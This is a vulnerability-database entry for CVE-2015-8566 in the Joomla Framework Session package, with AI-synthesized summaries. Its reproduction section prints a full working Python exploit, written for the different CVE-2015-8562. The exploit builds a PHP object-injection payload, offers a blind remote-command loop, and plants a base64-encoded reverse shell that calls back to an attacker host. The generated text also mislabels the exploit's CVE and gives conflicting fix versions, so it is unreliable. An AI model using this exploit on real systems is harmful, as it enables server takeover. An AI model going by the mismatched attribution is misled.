CVE-2015-8566
Description
Session package 1.x before 1.3.1 for Joomla! Framework allows remote code execution via crafted session values.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Session package 1.x before 1.3.1 for Joomla! Framework allows remote code execution via crafted session values.
Vulnerability
The Session package for the Joomla! Framework, versions 1.x prior to 1.3.1, contains an input validation error that allows remote attackers to execute arbitrary code. The vulnerability is triggered by unspecified session values that are not properly sanitized, leading to potential code injection. Affected versions include all 1.x releases before the 1.3.1 fix [1][2][4].
Exploitation
An attacker requires network access to a system using the vulnerable Session package. The attacker can send specially crafted session values to the application, which are then processed unsafely. No authentication is necessary if the session handling is exposed, and user interaction is not required beyond the initial request. The exact exploitation steps are not detailed in the available references, but the vulnerability class is input validation error [1][4].
Impact
Successful exploitation allows remote code execution on the server. The attacker gains the ability to run arbitrary commands or code with the privileges of the web server process. This can lead to full compromise of the application and potentially the underlying system, including data theft, modification, or service disruption [1][2].
Mitigation
Users should upgrade to the Session package version 1.3.1 or later, which was released on December 14, 2015 [1][2]. The fix is available via Composer by updating to joomla/session version ~2.0 or later (the framework moved to version 2.x line). No workarounds are documented. The vulnerability is not listed on CISA's Known Exploited Vulnerabilities (KEV) catalog as of the publication date [3].
AI Insight generated on May 23, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
joomla/sessionPackagist | < 1.3.1 | 1.3.1 |
Affected products
2Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"The Session package improperly handles session values, allowing for object injection and arbitrary code execution."
Attack vector
An attacker can send a specially crafted session value, likely via the 'X-Forwarded-For' header, to the vulnerable Joomla Framework installation. This input is not properly neutralized and is used in a way that allows for object injection. The injection leads to the deserialization of malicious objects, ultimately enabling remote code execution on the server [ref_id=1].
Affected code
The vulnerability resides within the Session package of the Joomla Framework, specifically in versions prior to 1.3.1. The exploit details mention the use of a serialized PHP object structure that targets specific classes within the framework, such as 'JDatabaseDriverMysqli' and 'JSimplepieFactory', to achieve code execution [ref_id=1].
What the fix does
The advisory indicates that versions prior to 1.3.1 are affected. Updating to version 1.3.1 or later is recommended to remediate the vulnerability. The patch likely addresses the improper handling of session values that leads to object injection, ensuring that external input cannot be used to instantiate arbitrary objects or execute code.
Preconditions
- inputThe attacker must be able to send a crafted session value, potentially via the 'X-Forwarded-For' header.
- configThe target must be running a vulnerable version of the Joomla Framework's Session package (1.x before 1.3.1).
Reproduction
```python #!/usr/bin/env python
# Exploit Title: Joomla 1.5 - 3.4.6 Object Injection RCE X-Forwarded-For header # Date: 12/17/2015 # Exploit Author: original - Gary@ Sec-1 ltd, Modified - Andrew McNicol BreakPoint Labs (@0xcc_labs) # Vendor Homepage: https://www.joomla.org/ # Software Link: http://joomlacode.org/gf/project/joomla/frs/ # Version: Joomla 1.5 - 3.4.6 # Tested on: Ubuntu 14.04.2 LTS (Joomla! 3.2.1 Stable) # CVE : CVE-2015-8562
''' Joomla 1.5 - 3.4.6 Object Injection RCE - CVE-2015-8562 PoC for CVE-2015-8562 to spawn a reverse shell or automate RCE
Original PoC from Gary@ Sec-1 ltd (http://www.sec-1.com): https://www.exploit-db.com/exploits/38977/
Vulnerability Info, Exploit, Detection: https://breakpoint-labs.com/joomla-rce-cve-2015-8562/
Exploit modified to use "X-Forwarded-For" header instead of "User-Agent" to avoid default logged to access.log
Usage - Automate Blind RCE: python joomla-rce-2-shell.py -t http://192.168.1.139/ --cmd $ touch /tmp/newhnewh
Usage - Spawn Reverse Shell using Pentestmonkey's Python one-liner and netcat listener on local host: python joomla-rce-2-shell.py -t http://192.168.1.139/ -l 192.168.1.119 -p 4444 [-] Attempting to exploit Joomla RCE (CVE-2015-8562) on: http://192.168.1.139/ [-] Uploading python reverse shell with LHOST:192.168.1.119 and LPORT:4444 <Response [200]> [+] Spawning reverse shell.... <Response [200]>
Listening on [0.0.0.0] (family 0, port 4444) $ python -c "import pty;pty.spawn('/bin/bash')" www-data@ubuntu:/$ id uid=33(www-data) gid=33(www-data) groups=33(www-data) www-data@ubuntu:/$
'''
import requests import subprocess import argparse import sys import base64
# Heavy lifting from PoC author Gary@ Sec-1 ltd (http://www.sec-1.com) def get_url(url, user_agent):
headers = { 'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3', # Change default UA for Requests 'x-forwarded-for': user_agent # X-Forwarded-For header instead of UA } cookies = requests.get(url,headers=headers).cookies for _ in range(3): response = requests.get(url, headers=headers,cookies=cookies) return response
def php_str_noquotes(data): """Convert string to chr(xx).chr(xx) for use in php""" encoded = "" for char in data: encoded += "chr({0}).".format(ord(char))
return encoded[:-1]
def generate_payload(php_payload):
php_payload = "eval({0})".format(php_str_noquotes(php_payload))
terminate = '\xf0\xfd\xfd\xfd'; exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";''' injected_payload = "{};JFactory::getConfig();exit".format(php_payload) exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload) exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}'''+ terminate
return exploit_template
def main(): parser = argparse.ArgumentParser(prog='cve-2015-8562.py', description='Automate blind RCE for Joomla vuln CVE-2015-8652') parser.add_argument('-t', dest='RHOST', required=True, help='Remote Target Joomla Server') parser.add_argument('-l', dest='LHOST', help='specifiy local ip for reverse shell') parser.add_argument('-p', dest='LPORT', help='specifiy local port for reverse shell') parser.add_argument('--cmd', dest='cmd', action='store_true', help='drop into blind RCE')
args = parser.parse_args()
if args.cmd: print "[-] Attempting to exploit Joomla RCE (CVE-2015-8562) on: {}".format(args.RHOST) print "[-] Dropping into shell-like environment to perform blind RCE" while True: command = raw_input('$ ') cmd_str = "system('{}');".format(command) pl = generate_payload(cmd_str) print get_url(args.RHOST, pl)
# Spawn Reverse Shell using Netcat listener + Python shell on victim elif args.LPORT and args.LPORT: connection = "'{}', {}".format(args.LHOST, args.LPORT)
# pentestmonkey's Python reverse shell one-liner: shell_str = '''import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('''+connection+'''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);''' # Base64 encoded the Python reverse shell as some chars were messing up in the exploit encoded_comm = base64.b64encode(shell_str) # Stage 1 payload Str payload = "echo {} | base64 -d > /tmp/newhnewh.py".format(encoded_comm) print "[-] Attempting to exploit Joomla RCE (CVE-2015-8562) on: {}".format(args.RHOST) print "[-] Uploading python reverse shell with LHOST {} and {}".format(args.LHOST, args.LPORT) # Stage 1: Uploads the Python reverse shell to "/tmp/newhnewh.py" pl = generate_payload("system('"+payload+"');") print get_url(args.RHOST, pl) # Spawns Shell listener using netcat on LHOST listener = subprocess.Popen(args=["gnome-terminal", "--command=nc -lvp "+args.LPORT]) print "[+] Spawning reverse shell...." # Stage 2: Executes Python reverse shell back to LHOST:LPORT pl = generate_payload("system('python /tmp/newhnewh.py');") print get_url(args.RHOST, pl) else: print '[!] missing arguments' parser.print_help()
if __name__ == "__main__": main() ``` [ref_id=1]
**Usage - Automate Blind RCE:** ```bash python joomla-rce-2-shell.py -t http://192.168.1.139/ --cmd $ touch /tmp/newhnewh ```
**Usage - Spawn Reverse Shell:** ```bash python joomla-rce-2-shell.py -t http://192.168.1.139/ -l 192.168.1.119 -p 4444 ``` This will attempt to exploit the vulnerability, upload a Python reverse shell to `/tmp/newhnewh.py`, and then execute it to establish a connection back to the specified LHOST and LPORT. A netcat listener will be spawned on the attacker's machine to receive the shell. [ref_id=1]
Generated on Jun 2, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
6- developer.joomla.org/security-centre/637-20151205-session-remote-code-execution-vulnerability.htmlnvdVendor AdvisoryWEB
- github.com/advisories/GHSA-wwfh-28hx-w2r2ghsaADVISORY
- nvd.nist.gov/vuln/detail/CVE-2015-8566ghsaADVISORY
- github.com/FriendsOfPHP/security-advisories/blob/master/joomla/session/CVE-2015-8566.yamlghsaWEB
- web.archive.org/web/20160603093633/http://www.securityfocus.com/bid/79197ghsaWEB
- www.securityfocus.com/bid/79197nvd
News mentions
0No linked articles in our index yet.